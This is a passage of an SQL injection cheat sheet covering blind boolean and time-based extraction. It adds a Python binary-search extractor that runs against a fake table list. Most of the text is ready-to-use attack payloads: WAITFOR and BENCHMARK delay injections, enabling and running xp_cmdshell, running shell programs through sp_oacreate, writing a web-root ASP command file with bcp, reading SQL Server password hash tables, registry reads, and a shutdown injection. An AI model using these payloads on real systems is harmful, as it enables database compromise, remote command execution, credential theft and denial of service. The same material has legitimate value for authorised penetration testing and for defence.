FALSE : SELECT ID, Username, Email FROM [User]WHERE ID = 1 AND ISNULL(ASCII(SUBSTRING((SELECT TOP 1 name FROM sysObjects WHERE xtYpe=0x55 AND name NOT IN(SELECT TOP 0 name FROM sysObjects WHERE xtYpe=0x55)),1,1)),0)>89--

TRUE : SELECT ID, Username, Email FROM [User]WHERE ID = 1 AND ISNULL(ASCII(SUBSTRING((SELECT TOP 1 name FROM sysObjects WHERE xtYpe=0x55 AND name NOT IN(SELECT TOP 0 name FROM sysObjects WHERE xtYpe=0x55)),1,1)),0)<89--

FALSE : SELECT ID, Username, Email FROM [User]WHERE ID = 1 AND ISNULL(ASCII(SUBSTRING((SELECT TOP 1 name FROM sysObjects WHERE xtYpe=0x55 AND name NOT IN(SELECT TOP 0 name FROM sysObjects WHERE xtYpe=0x55)),1,1)),0)>83--

TRUE : SELECT ID, Username, Email FROM [User]WHERE ID = 1 AND ISNULL(ASCII(SUBSTRING((SELECT TOP 1 name FROM sysObjects WHERE xtYpe=0x55 AND name NOT IN(SELECT TOP 0 name FROM sysObjects WHERE xtYpe=0x55)),1,1)),0)<83--

FALSE : SELECT ID, Username, Email FROM [User]WHERE ID = 1 AND ISNULL(ASCII(SUBSTRING((SELECT TOP 1 name FROM sysObjects WHERE xtYpe=0x55 AND name NOT IN(SELECT TOP 0 name FROM sysObjects WHERE xtYpe=0x55)),1,1)),0)>80--

FALSE : SELECT ID, Username, Email FROM [User]WHERE ID = 1 AND ISNULL(ASCII(SUBSTRING((SELECT TOP 1 name FROM sysObjects WHERE xtYpe=0x55 AND name NOT IN(SELECT TOP 0 name FROM sysObjects WHERE xtYpe=0x55)),1,1)),0)<80--

Since both of the last two queries are false, the first character's ASCII value is neither greater nor less than 80, so it is exactly 80, which means the first character is 'P'. This is how blind SQL injection is exploited with a binary search (about seven requests per character over the 7-bit ASCII range). The other well-known way is reading the data bit by bit. Both can be effective under different conditions.

Waiting For Blind SQL Injections

First of all, use this only if the injection is really blind; otherwise just use 1/0-style errors to tell true from false. Second, be careful with delays longer than 20-30 seconds: the database API connection or the script can time out.

WAITFOR DELAY 'time' (S)

This is just like sleep: it waits for the specified time. It is a CPU-safe way to make the database wait.
WAITFOR DELAY '0:0:10'--
You can also use fractions of a second, like this:
WAITFOR DELAY '0:0:0.51'

Real World Samples

  • Are we 'sa' ?
    if (select user) = 'sa' waitfor delay '0:0:10'
  • ProductID = 1;waitfor delay '0:0:10'--
  • ProductID =1);waitfor delay '0:0:10'--
  • ProductID =1';waitfor delay '0:0:10'--
  • ProductID =1');waitfor delay '0:0:10'--
  • ProductID =1));waitfor delay '0:0:10'--
  • ProductID =1'));waitfor delay '0:0:10'--

BENCHMARK() (M)

Basically we are abusing this function to make MySQL wait a bit by burning CPU. Be careful: you will hit the web server's limits very fast! (MySQL 5.0.12 and later also have SLEEP(seconds), which waits without burning CPU.)
BENCHMARK(howmanytimes, expression)

Real World Samples

  • Are we root? woot! (MySQL's IF is a function, not a statement, so the test and the delay go into IF(condition, then, else))
    SELECT IF(EXISTS(SELECT * FROM users WHERE username = 'root'), BENCHMARK(1000000000,MD5(1)), 0)

  • Check whether a table exists in MySQL (the query errors out immediately if the table is missing, and is delayed if it exists)
    SELECT IF((SELECT COUNT(*) FROM login) >= 0, BENCHMARK(1000000,MD5(1)), 0)

pg_sleep(seconds) (P)

Sleep for supplied seconds.

  • SELECT pg_sleep(10);
    Sleep 10 seconds.
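The binary search in the table-name sample above and the delay functions in this section are driven by the same loop: a per-character search that only ever asks "is the ASCII value greater than N?". As an added example, not code from the original cheat sheet or the tool that produced the sample, here is that driver in Python against a constructed fake target: FAKE_USER_TABLES stands in for sysobjects, boolean_oracle for a page that answers true/false, and make_timing_oracle for a page that only leaks through a WAITFOR-style delay. The SQL Server condition is built the same way as in the sample queries.

```python
import re
import time
from typing import Callable, List

# Constructed stand-in for "SELECT name FROM sysobjects WHERE xtype='U'"
# on the target; not data from any real system.
FAKE_USER_TABLES = ["Products", "Users", "Orders"]


def condition(table_index: int, pos: int, op: str, value: int) -> str:
    """The condition appended after 'AND' in the injected WHERE clause.

    TOP {table_index} inside NOT IN skips the tables already enumerated
    (TOP 0 = first table), and ISNULL(..., 0) makes a SUBSTRING past the end
    of the name compare as 0, which is how the end of a name is detected.
    """
    skip = f"SELECT TOP {table_index} name FROM sysobjects WHERE xtype=0x55"
    first = f"SELECT TOP 1 name FROM sysobjects WHERE xtype=0x55 AND name NOT IN ({skip})"
    return f"ISNULL(ASCII(SUBSTRING(({first}),{pos},1)),0){op}{value}"


def extract_char(ask: Callable[[str], bool], table_index: int, pos: int) -> int:
    """Binary search over ASCII 0-127 using only '> N' questions: seven
    requests per character instead of up to 128 with a linear scan."""
    lo, hi = 0, 127
    while lo < hi:
        mid = (lo + hi) // 2
        if ask(condition(table_index, pos, ">", mid)):
            lo = mid + 1          # value is above mid
        else:
            hi = mid              # value is mid or below
    return lo


def extract_name(ask: Callable[[str], bool], table_index: int, max_len: int = 128) -> str:
    chars = []
    for pos in range(1, max_len + 1):
        c = extract_char(ask, table_index, pos)
        if c == 0:                # ISNULL(...,0): ran past the end of the name
            break
        chars.append(chr(c))
    return "".join(chars)


def extract_user_tables(ask: Callable[[str], bool], limit: int = 50) -> List[str]:
    names = []
    for index in range(limit):
        name = extract_name(ask, index)
        if not name:              # nothing left after skipping `index` tables
            break
        names.append(name)
    return names


# ---- fake target: plays the database behind the vulnerable page ----
_COND = re.compile(r"NOT IN \(SELECT TOP (\d+) name [^)]*\)\),(\d+),1\)\),0\)([<>=])(\d+)$")


def _evaluate(cond: str) -> bool:
    """Evaluate a condition() string against FAKE_USER_TABLES."""
    m = _COND.search(cond)
    if not m:
        raise ValueError("unrecognised condition: " + cond)
    index, pos, op, value = int(m[1]), int(m[2]), m[3], int(m[4])
    name = FAKE_USER_TABLES[index] if index < len(FAKE_USER_TABLES) else ""
    char = ord(name[pos - 1]) if pos <= len(name) else 0
    return {"<": char < value, ">": char > value, "=": char == value}[op]


def boolean_oracle(cond: str) -> bool:
    """'Normal blind': the page differs (content or HTTP status) depending on
    whether the condition holds, e.g. the product row is returned or not."""
    return _evaluate(cond)


def make_timing_oracle(delay: float = 0.02) -> Callable[[str], bool]:
    """'Totally blind': the page looks identical either way, but the query runs
    IF (<cond>) WAITFOR DELAY ..., so truth is read from the response time.
    The threshold must sit well above normal jitter, and the delay well below
    the script/API timeout (the 20-30 s warning above)."""
    def ask(cond: str) -> bool:
        start = time.monotonic()
        if _evaluate(cond):
            time.sleep(delay)     # stands in for WAITFOR DELAY on the server
        return time.monotonic() - start >= delay / 2
    return ask


if __name__ == "__main__":
    print(condition(0, 1, ">", 78))           # tail of the sample's first TRUE query
    print(extract_user_tables(boolean_oracle))
    print(extract_name(make_timing_oracle(), 1))
```

Against a real target, ask() would send the condition inside the vulnerable parameter and return whether the page matched the TRUE variant (or whether the response took longer than the threshold); everything above ask() stays the same, which is why a tool can switch between boolean and time-based extraction without changing its search.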

SQL Injection Cheat Sheet 3

Bulk Insert (S)

Inserts the content of a file into a table. If you don't know the internal path of the web application, you can read the IIS metabase file (IIS 6 only: %systemroot%\system32\inetsrv\MetaBase.xml) and search it to identify the application path.
    1. CREATE TABLE foo( line varchar(8000) )
    2. BULK INSERT foo FROM 'c:\inetpub\wwwroot\login.asp'
    3. Drop the temp table, and repeat for another file.

BCP (S)

Writes a text file. bcp is a command-line tool, so from an injection it is run through xp_cmdshell, and login credentials are required to use it.
bcp "SELECT * FROM test..foo" queryout c:\inetpub\wwwroot\runcommand.asp -c -Slocalhost -Usa -Pfoobar

VBS, WSH in SQL Server (S)

You can use VBS/WSH scripting from SQL Server through the OLE Automation procedures (sp_OACreate, sp_OAMethod). Like xp_cmdshell, these are disabled by default in SQL Server 2005 ('Ole Automation Procedures' in sp_configure).
declare @o int
exec sp_oacreate 'wscript.shell', @o out
exec sp_oamethod @o, 'run', NULL, 'notepad.exe'
Username: '; declare @o int exec sp_oacreate 'wscript.shell', @o out exec sp_oamethod @o, 'run', NULL, 'notepad.exe' --

Executing system commands, xp_cmdshell (S)

A well-known trick. By default it is disabled in SQL Server 2005 (see "Enabling xp_cmdshell in SQL Server 2005" below); you need sysadmin access.
EXEC master.dbo.xp_cmdshell 'dir c:\'

Simple ping check (configure your firewall or sniffer to spot the request before launching it):
EXEC master.dbo.xp_cmdshell 'ping <ip address>'
You cannot read the results directly through error-based or UNION techniques; the out-of-band ping (or INSERT ... EXEC into a table you can then query, see the bulk notes below) is the way to observe them.

Some Special Tables in SQL Server (S)

  • Error Messages
    master..sysmessages

  • Linked Servers
    master..sysservers

  • Passwords (both 2000 and 2005 hashes can be cracked; they use very similar hashing algorithms)
    SQL Server 2000: master..sysxlogins
    SQL Server 2005: sys.sql_logins

More Stored Procedures for SQL Server (S)

  1. Cmd Execute (xp_cmdshell)
    exec master..xp_cmdshell 'dir'

  2. Registry Stuff (xp_regread)
    1. xp_regaddmultistring
    2. xp_regdeletekey
    3. xp_regdeletevalue
    4. xp_regenumkeys
    5. xp_regenumvalues
    6. xp_regread
    7. xp_regremovemultistring
    8. xp_regwrite
      exec xp_regread HKEY_LOCAL_MACHINE, 'SYSTEM\CurrentControlSet\Services\lanmanserver\parameters', 'nullsessionshares'
      exec xp_regenumvalues HKEY_LOCAL_MACHINE, 'SYSTEM\CurrentControlSet\Services\snmp\parameters\validcommunities'

  3. Managing Services (xp_servicecontrol)
  4. Medias (xp_availablemedia)
  5. ODBC Resources (xp_enumdsn)
  6. Login mode (xp_loginconfig)
  7. Creating Cab Files (xp_makecab)
  8. Domain Enumeration (xp_ntsec_enumdomains)
  9. Process Killing (need PID) (xp_terminate_process)
  10. Add a new extended procedure (effectively you can execute whatever you want)
    sp_addextendedproc 'xp_webserver', 'c:\temp\x.dll'
    exec xp_webserver
  11. Write text file to a UNC or an internal path (sp_makewebtask)

MSSQL Bulk Notes

SELECT * FROM master..sysprocesses /*WHERE spid=@@SPID*/
DECLARE @result int; EXEC @result = xp_cmdshell 'dir *.exe';IF (@result = 0) SELECT 0 ELSE SELECT 1/0
HOST_NAME()
IS_MEMBER (Transact-SQL)
IS_SRVROLEMEMBER (Transact-SQL)
OPENDATASOURCE (Transact-SQL)
INSERT tbl EXEC master..xp_cmdshell 'OSQL /Q"DBCC SHOWCONTIG"' -- captures command output into a table you can query afterwards
OPENROWSET (Transact-SQL) - http://msdn2.microsoft.com/en-us/library/ms190312.aspx
You can not use sub selects in SQL Server Insert queries.

SQL Injection in LIMIT (M) or ORDER (MSO)

SELECT id, product FROM test.test t LIMIT 0,0 UNION ALL SELECT 1,'x'/*,10 ;
If the injection is in the second LIMIT argument you can comment the rest out or use it in your UNION injection.

Shutdown SQL Server (S)

When you are really fed up: ';shutdown --

Enabling xp_cmdshell in SQL Server 2005

By default xp_cmdshell and a couple of other potentially dangerous stored procedures are disabled in SQL Server 2005. If you have sysadmin access you can enable them:

EXEC sp_configure 'show advanced options',1
RECONFIGURE

EXEC sp_configure 'xp_cmdshell',1
RECONFIGURE

Finding Database Structure in SQL Server (S)

Getting User defined Tables

SELECT name FROM sysobjects WHERE xtype = 'U'

Getting Column Names

SELECT name FROM syscolumns WHERE id =(SELECT id FROM sysobjects WHERE name = 'tablenameforcolumnnames')

Moving records (S)

  • Modify WHERE and use NOT IN or NOT EXISTS,
    ... WHERE users NOT IN ('First User', 'Second User')
    SELECT TOP 1 name FROM members WHERE NOT EXISTS(SELECT TOP 0 name FROM members) -- very good one

  • Using Dirty Tricks
    SELECT * FROM Product WHERE ID=2 AND 1=CAST((Select p.name from (SELECT (SELECT COUNT(i.id) AS rid FROM sysobjects i WHERE i.id<=o.id) AS x, name from sysobjects o) as p where p.x=3) as int)

    Select p.name from (SELECT (SELECT COUNT(i.id) AS rid FROM sysobjects i WHERE xtype='U' and i.id<=o.id) AS x, name from sysobjects o WHERE o.xtype = 'U') as p where p.x=21


Fast way to extract data from Error Based SQL Injections in SQL Server (S)

';BEGIN DECLARE @rd varchar(8000) SET @rd=':' SELECT @rd=@rd+' '+name FROM syscolumns WHERE id =(SELECT id FROM sysobjects WHERE name = 'MEMBERS') AND name>@rd SELECT @rd AS rd into TMP_SYS_TMP end;--